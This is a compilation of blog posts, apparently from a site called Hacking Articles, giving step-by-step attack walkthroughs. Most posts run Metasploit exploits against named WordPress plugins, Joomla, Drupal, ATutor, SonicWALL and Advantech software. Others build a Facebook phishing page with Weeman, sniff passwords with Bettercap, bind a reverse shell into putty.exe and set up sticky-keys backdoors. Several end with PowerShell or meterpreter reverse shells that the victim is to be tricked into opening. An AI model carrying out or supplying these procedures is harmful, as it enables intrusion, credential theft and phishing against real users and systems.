This module exploits an arbitrary PHP code upload in the WordPress Infusionsoft Gravity Forms plugin, versions from 1.5.3 to 1.5.10. The vulnerability allows for arbitrary file upload and remote code execution.

 Exploit Targets

Infusionsoft Gravity Forms plugin 1.5.3

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/unix/webapp/wp_infusionsoft_upload

msf exploit (wp_infusionsoft_upload)>set targeturi /wordpress

msf exploit (wp_infusionsoft_upload)>set rhost 192.168.0.110 (IP of Remote Host)

msf exploit (wp_infusionsoft_upload)>set rport 80

msf exploit (wp_infusionsoft_upload)>exploit       

The post Exploit Web Server using WordPress InfusionSoft Upload Vulnerability appeared first on Hacking Articles.

WordPress Shopping Cart (WP EasyCart) Plugin for WordPress contains a flaw that allows a remote attacker to execute arbitrary PHP code. This flaw exists because the /inc/amfphp/administration/banneruploaderscript.php script does not properly verify or sanitize user-uploaded files. By uploading a .php file, the remote system will place the file in a user-accessible path. Making a direct request to the uploaded file will allow the attacker to execute the script with the privileges of the web server. In versions <= 3.0.8 authentication can be done by using the WordPress credentials of a user with any role. In later versions, a valid EasyCart admin password will be required that is in use by any admin user. A default installation of EasyCart will setup a user called “demouser” with a preset password of “demouser”.

 Exploit Targets

wp-easycart

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/unix/webapp/wp_easycart_unrestricted_file_upload

msf exploit (wp_easycart_unrestricted_file_upload)>set targeturi wordpress

msf exploit (wp_easycart_unrestricted_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)

msf exploit (wp_easycart_unrestricted_file_upload)>set rport 80

msf exploit (wp_easycart_unrestricted_file_upload)>exploit       

The post Hack Web Server using WordPress WP EasyCart Unrestricted File Upload appeared first on Hacking Articles.

Multiple DLL side loading vulnerabilities were found in various COM components. These issues can be exploited by loading various these components as an embedded OLE object. When instantiating a vulnerable object Windows will try to load one or more DLLs from the current working directory. If an attacker convinces the victim to open a specially crafted (Office) document from a directory also containing the attacker’s DLL file, it is possible to execute arbitrary code with the privileges of the target user. This can potentially result in the attacker taking complete control of the affected system.

Exploit Targets

MS Office 2013

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/fileformat/ms15_132_dll_sideload

msf exploit (ms15_132_dll_sideload)>set payload windows/meterpreter/reverse_tcp

msf exploit (ms15_132_dll_sideload)>set lhost 192.168.0.119 (IP of Local Host)

msf exploit (ms15_132_dll_sideload)>exploit

After we successfully generate the malicious dll and ppsx File, it will stored on your local computer

/root/.msf4/local

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.119

exploit

Now send your malicious PPT files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer

The post Hack Remote Windows PC using Office OLE multiple DLL side loading vulnerabilities appeared first on Hacking Articles.

Weeman is a simple python http server script that creates powerful phishing page. It work just like other phishing framework, simply it takes credentials from users when they type confidential information like usernames, passwords, credit card-numbers and  take that inputs and show you on weeman terminal.

So let’s start. First clone weeman repository from github, to do so type:

github clone https://github.com/Hypsurus/weeman

Then change your directory

cd /root/Desktop/weeman

After that start weeman by typing in terminal:

./weeman.py

Now type show in terminal to see what are the things required to create a phishing page. Here in this article we are creating Facebook phishing page.

Let’s start, type:

set url http://www.facebook.com

In this command you will give the website you want to clone.

Now type:

set port 8080

Now type:

set action_url http://www.facebook.com

this command is used to set the url where you want to redirect the victim after they give username and password, in our case we used facebook.

now finally type in terminal:

run

After that it will create an http server and give you a link. Now send that link to victim by using social engineering technique. When victim open that link and type their use rid and password.

Bingooo. Now automatically you can see that confidential info on your terminal.

The post Weeman – HTTP Server for Phishing appeared first on Hacking Articles.

Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5. By storing user supplied headers in the databases session table it’s possible to truncate the input by sending an UTF-8 character. The custom created payload is then executed once the session is read from the databse. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13. In later versions the deserialisation of invalid session data stops on the first error and the exploit will not work. The PHP Patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and 5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1.

 Exploit Targets

Joomla 1.5.0 – 3.4.5

Requirement

Attacker: kali Linux

Victim PC: Joomla 3.4.5

Open Kali terminal type msfconsole

Now type use exploit/multi/http/joomla_http­_header_rce

msf exploit (joomla_http­_header_rce)>set payload php/meterpreter/reverse_tcp

msf exploit (joomla_http­_header_rce)>set lhost 192.168.0.106 (IP address of kali Linux)

msf exploit (joomla_http­_header_rce)>set targeturi /joomla/

msf exploit (joomla_http­_header_rce)>set rhost 192.168.0.104 (IP of Remote Host)

msf exploit (joomla_http­_header_rce)>set rport 80

msf exploit (joomla_http­_header_rce)>exploit        

The post Hack Web Server using Joomla HTTP Header Unauthenticated Remote Code Execution appeared first on Hacking Articles.

This module exploits remote code execution vulnerability in PHP Utility Belt, which is a set of tools for PHP developers and should not be installed in a production environment, since this application runs arbitrary PHP code as an intended functionality.

 Exploit Targets

PHP Utility Belt

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/http/php_utility_belt_rce

msf exploit (php_utility_belt_rce)>set targeturi /php-utility-belt-master/ajax.php

msf exploit (php_utility_belt_rce)>set rhost 192.168.0.110 (IP of Remote Host)

msf exploit (php_utility_belt_rce)>set rport 80

msf exploit (php_utility_belt_rce)>exploit        

The post Hack Web Server using PHP Utility Belt Remote Code Execution appeared first on Hacking Articles.

This module exploits SQL Injection vulnerability and authentication weakness vulnerability in ATutor. This essentially means an attacker can bypass authentication and reach the administrator’s interface where they can upload malicious code.

 Exploit Targets

ATutor 2.2.1

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/http/atutor_sqli

msf exploit (atutor_sqli)>set targeturi /Atutor/

msf exploit (atutor_sqli)>set rhost 192.168.0.110 (IP of Remote Host)

msf exploit (atutor_sqli)>set rport 80

msf exploit (atutor_sqli)>exploit       

The post Hack Web Server using ATutor 2.2.1 SQL Injection / Remote Code Execution appeared first on Hacking Articles.

This module exploits an arbitrary PHP code execution flaw in the WordPress blogging software plugin known as Foxypress. The vulnerability allows for arbitrary file upload and remote code execution via the uploadify.php script. The Foxypress plugin versions 0.4.1.1 to 0.4.2.1 are vulnerable.

 Exploit Targets

Foxypress plugin versions 0.4.1.1 to 0.4.2.1

Requirement

Attacker: kali Linux

Victim PC: Foxypress plugin

Open Kali terminal type msfconsole

Now type use exploit/unix/webapp/wp_foxypress_upload

msf exploit (wp_foxypress_upload)>set targeturi /wordpress

msf exploit (wp_foxypress_upload)>set rhost 192.168.0.105 (IP of Remote Host)

msf exploit (wp_foxypress_upload)>set rport 80

msf exploit (wp_foxypress_upload)>exploit

The post Hack Remote Server using WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution appeared first on Hacking Articles.

This module exploits the Drupal HTTP Parameter Key/Value SQL Injection (aka Drupageddon) in order to achieve a remote shell on the vulnerable instance. This module was tested against Drupal 7.0 and 7.31 (was fixed in 7.32).

 Exploit Targets

Drupal 7.0

Requirement

Attacker: kali Linux

Victim PC: Drupal 7.0

Open Kali terminal type msfconsole

Now type use exploit/multi/http/drupal_drupageddon

msf exploit (drupal_drupageddon)>set targeturi /drupal/

msf exploit (drupal_drupageddon)>set rhost 192.168.0.109 (IP of Remote Host)

msf exploit (drupal_drupageddon)>set rport 80

msf exploit (drupal_drupageddon)>exploit         

The post Hack Drupal Website Server using Drupal HTTP Parameter Key/Value SQL Injection appeared first on Hacking Articles.

Waybackpack is a command-line tool that lets you download the entire Wayback Machine archive for a given URL

Open your Kali Linux terminal and go to desktop and type the following command

git clone https://github.com/jsvine/waybackpack.git

Now go the waybackpack folder and type the following command

pip install waybackpack

Now run the following command to view any website for the particular year and save the result in .html format in the desired folder.

In example below I’m using hackingarticles.in for the year 2010 and saving the result in /Downloads/hacking-wayback

Now you will see the saved file in the desired folder.

See the result below

The post Find Your Website History using Waybackpack appeared first on Hacking Articles.

Open your kali linux terminal and type

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.140 lport=4444 -f raw

It will generate a raw code of php file

Now copy the generated code in the text file and save it on your desktop with .php extension

Now open the DVWA Webapp in your server and login with following credentials:

Username – admin

Password – password

Now scroll to the File Upload section in left pane and upload the above created php file

When you will finish uploading your php file, it will show you the path

Now open your uploaded file in browser

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.140

set lport 4444

exploit

Now you can access the victim’s server

The post Web Server Penetration Testing with DVWA and Metasploit (Beginner Guide) appeared first on Hacking Articles.

First clone cypher repository from github, to do so type:

git clone https://github.com/xan7r/cypher.git

Now choose an executable file and copy to cypher folder to bind the cypher with any .exe file

Here in my case I have copied putty.exe as a file to bind with cipher

Note: only executable file can be binded.

Now run the following command

python addShell.py -f ./putty.exe -H 192.168.0.105 -P 4444 -p 0

Specify payload.  Default shell_reverse_tcp.  Valid values are:

0 – windows/shell_reverse_tcp

1 – windows/meterpreter/reverse_http

2 – windows/meterpreter/reverse_http +PrependMigrate

3 – windows/meterpreter/reverse_https

4 – windows/meterpreter/reverse_https +PrependMigrate

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed. Start metasploit using msfconsole

use exploit/multi/handler

set payload windows/shell_reverse_tcp

set lhost 192.168.0.105

set lport 4444

exploit

Now send the binded putty_evil .exe to the victim, as soon as he opens the file a shell session will open

The post Hack Remote Windows 10 PC using Cypher (Adding Shellcode to PE files) appeared first on Hacking Articles.

This module exploits a vulnerability found in Dell SonicWALL Scrutinizer. The methodDetail parameter in exporters.php allows an attacker to write arbitrary files to the file system with an SQL Injection attack, and gain remote code execution under the context of SYSTEM for Windows, or as Apache for Linux. Authentication is required to exploit this vulnerability, but this module uses the default admin:admin credential.

Exploit Targets

Dell SonicWALL Scrutinizer 11.01

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli

msf exploit (sonicwall_scrutinizer_methoddetail_sqli)>set payload windows/meterpreter/reverse_tcp

msf exploit (sonicwall_scrutinizer_methoddetail_sqli)>set lhost 192.168.0.108 (IP of Local Host)

msf exploit (sonicwall_scrutinizer_methoddetail_sqli)>set rhost 192.168.0.120

msf exploit (sonicwall_scrutinizer_methoddetail_sqli)>exploit

The post Hack Remote Windows PC using Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection appeared first on Hacking Articles.

This module exploits an arbitrary file upload vulnerability found in Advantech WebAccess 8.0. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability. The specific flaw exists within the WebAccess Dashboard Viewer. Insufficient validation within the uploadImageCommon function in the UploadAjaxAction script allows unauthenticated callers to upload arbitrary code (instead of an image) to the server, which will then be executed under the high-privilege context of the IIS AppPool.

Exploit Targets

Advantech WebAccess 8.0

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/scada/advantech_webaccess_dashboard_file_upload

msf exploit (advantech_webaccess_dashboard_file_upload)>set lhost 192.168.0.108 (IP of Local Host)

msf exploit (advantech_webaccess_dashboard_file_upload)>set rhost 192.168.0.102

msf exploit (advantech_webaccess_dashboard_file_upload)>set rport 80

msf exploit (advantech_webaccess_dashboard_file_upload)>set targeturi /

msf exploit (advantech_webaccess_dashboard_file_upload)>exploit

The post Exploit Remote PC using Advantech WebAccess Dashboard Viewer upload Image Common Arbitrary File Upload appeared first on Hacking Articles.

This bash script tests for sticky keys and utilman backdoors. The script will connect to an RDP server; send both the sticky keys and utilman triggers and screenshot the result.

How does it work?

• Connects to RDP using rdesktop
• Sends shift 5 times using xdotool to trigger sethc.exe backdoors
• Sends Windows+u using xdotool to trigger utilman.exe backdoors
• Takes screenshot
• Kills RDP connection

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Bypass the UAC Protection of Victim PC (Tutorial How to Bypass UAC Protection)

After getting the session enable the remote desktop option of remote pc using following exploit

msf > use post/windows/manage/enable_rdp

msf post(enable_rdp) > set session 2

msf post(enable_rdp) > exploit

In Next step replace the sticke key with command prompt using following exploit

msf > use post/windows/manage/stickey_keys

msf post(stickey_keys) > set session 2

msf post(stickey_keys) > exploit

Now clone Sticky Keys Hunter repository from github, to do so type:

git clone https://github.com/ztgrace/sticky_keys_hunter.git

For scan a single host: ./stickyKeysHunter.sh 192.168.0.120

Now a pop will open like below

Now press shift key 5 times at the login screen now a command prompt will open up

Now you can do anything in victim pc through command prompt. I am using net user command to see the list of active account

The post Access Sticky keys Backdoor on Remote PC with Sticky Keys Hunter appeared first on Hacking Articles.

Note: In my case this trick works for only Internet Explorer users

Bettercap is a complete, modular, portable and easily extensible MITM tool and framework with every kind of diagnostic and offensive feature you could need in order to perform a man in the middle attack.

Go to Kali Linux terminal and type:

git clone https://github.com/evilsocket/bettercap.git

it will clone bettercap from github and store it in your root directory

After that change your directory. Now it’s time to install bettercap and its dependencies, it will use Ruby gems to install all its required dependencies.

 To install type:

gem build bettercap.gemspec

Now type:

sudo gem install bettercap*.gem

it will install bettercap and all its dependencies using gem

Now we have installed Bettercap and start sniffer for sniffing in network.

Type in terminal:

bettercap –proxy -P post

Here you can see the hacked facebook account and victim’s username and password.

See the example below :

The post Hack Gmail and Facebook Password in Network using Bettercap appeared first on Hacking Articles.

The WordPress SlideShow Gallery plugin contains an authenticated file upload vulnerability. An attacker can upload arbitrary files to the upload folder. Since the plugin uses its own file upload mechanism instead of the WordPress API, it’s possible to upload any file type.

 Exploit Targets

wordpress

Requirement

Attacker: kali Linux

Victim PC: WordPress

Open Kali terminal type msfconsole

Now type use exploit/unix/webapp/wp_slideshowgallery_upload

msf exploit (wp_slideshowgallery_upload)>set targeturi /

msf exploit (wp_slideshowgallery_upload)>set rhost 192.168.0.104 (IP of Remote Host)

msf exploit (wp_slideshowgallery_upload)>set rport 80

msf exploit (wp_slideshowgallery_upload)>set wp_user user

msf exploit (wp_slideshowgallery_upload)>set wp_password bitnami

msf exploit (wp_slideshowgallery_upload)>exploit          

The post Hack WordPress Server using WordPress SlideShow Gallery Authenticated File Upload appeared first on Hacking Articles.

Versions 2.9.36 to 2.9.42 of the Ninja Forms plugin contain an unauthenticated file upload vulnerability, allowing guests to upload arbitrary PHP code that can be executed in the context of the web server.

 Exploit Targets

ninja forms 2.9.36

Requirement

Attacker: kali Linux

Victim PC: wordpress

Open Kali terminal type msfconsole

Now type use exploit/unix/webapp/wp_ninja_forms_unauthenticated_file_upload

msf exploit (wp_ninja_forms_unauthenticated_file_upload)>set targeturi /wordpress/

msf exploit (wp_ninja_forms_unauthenticated_file_upload)>set rhost 192.168.0.106 (IP of Remote Host)

msf exploit (wp_ninja_forms_unauthenticated_file_upload)>set form_path /test/

msf exploit (wp_ninja_forms_unauthenticated_file_upload)>set rport 80

msf exploit (wp_ninja_forms_unauthenticated_file_upload)>exploit        

The post Hacking WordPress using Ninja Forms Unauthenticated File Upload appeared first on Hacking Articles.

A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems

first clone WPXF repository from github, to do so type:

https://github.com/rastating/wordpress-exploit-framework.git

now Open kali linux terminal in the directory that you have downloaded WordPress Exploit Framework to, and start it by running ruby wpxf.rb.

Once loaded, you’ll be presented with the wpxf prompt, from here you can search for modules using the search command or load a module using the use command.

wpxf > use exploit/refelex_gallery_shell_upload

wpxf [exploit/ refelex_gallery_shell_upload] > set host 192.168.0.104

wpxf [exploit/ refelex_gallery_shell_upload] > set target_uri /

wpxf [exploit/ refelex_gallery_shell_upload] > set payload reverse_tcp

wpxf [exploit/ refelex_gallery_shell_upload] > set lhost 192.168.0.105

wpxf [exploit/ refelex_gallery_shell_upload] > run

The post Penetration Testing in WordPress Website using WordPress Exploit Framework appeared first on Hacking Articles.

Brosec is a terminal based reference utility designed to help us infosec bros and broettes with useful (yet sometimes complex) payloads and commands that are often used during work as infosec practitioners. An example of one of Brosec’s most popular use cases is the ability to generate on the fly reverse shells (python, perl, powershell, etc) that get copied to the clipboard.

Firstly install the Brosec tool in your Kali Linux. Follow the below steps one by one:

Reference:

https://github.com/gabemarshall/Brosec

• apt-get install npm build-essential g++ xsel netcat Install dependencies
• npm config set registry http://registry.npmjs.org/ Npm registry seems to be broken by default when installed from Kali repos
• npm install -g n Install n (nodejs version manager)
• n latest Install latest version of nodejs
• git clone https://github.com/gabemarshall/Brosec.git – Clone Brosec repo
• cd Brosec && npm install – cd into the directory and install npm depdendencies

After that start Brosec by typing in terminal:

./bros

It will show you menu options.

Now set the IP of your localhost :

set lhost 192.168.0.111

Now set the lport :

set lport 4444

After setting the localhost and lport, choose option 5 Miscellaneous.

You will see 2 options Reverse Shells and Exfiltration. Now select option1 Reverse Shells, see the image below:

After choosing the option Reverse Shells, you will see 5 options. In my case I’m selecting option 4 Reverse Shell PSH

Now it will show you a message Should I start a netcat listener for you?

Press Y to start the netcat listener. It will generate a powershell script, see the below picture.

And copy this code in text editor and save it with .ps1 (powershell extension)

Now send the saved .ps1 file to the victim using any social engineering method. When the victim clicks on it, you will get the session of the victim’s PC. See the picture below for reference.

Now you can use the systeminfo command to get the information of the victim’s PC.

The post Hack Remote PC with Reverse PowerShell using Brosec appeared first on Hacking Articles.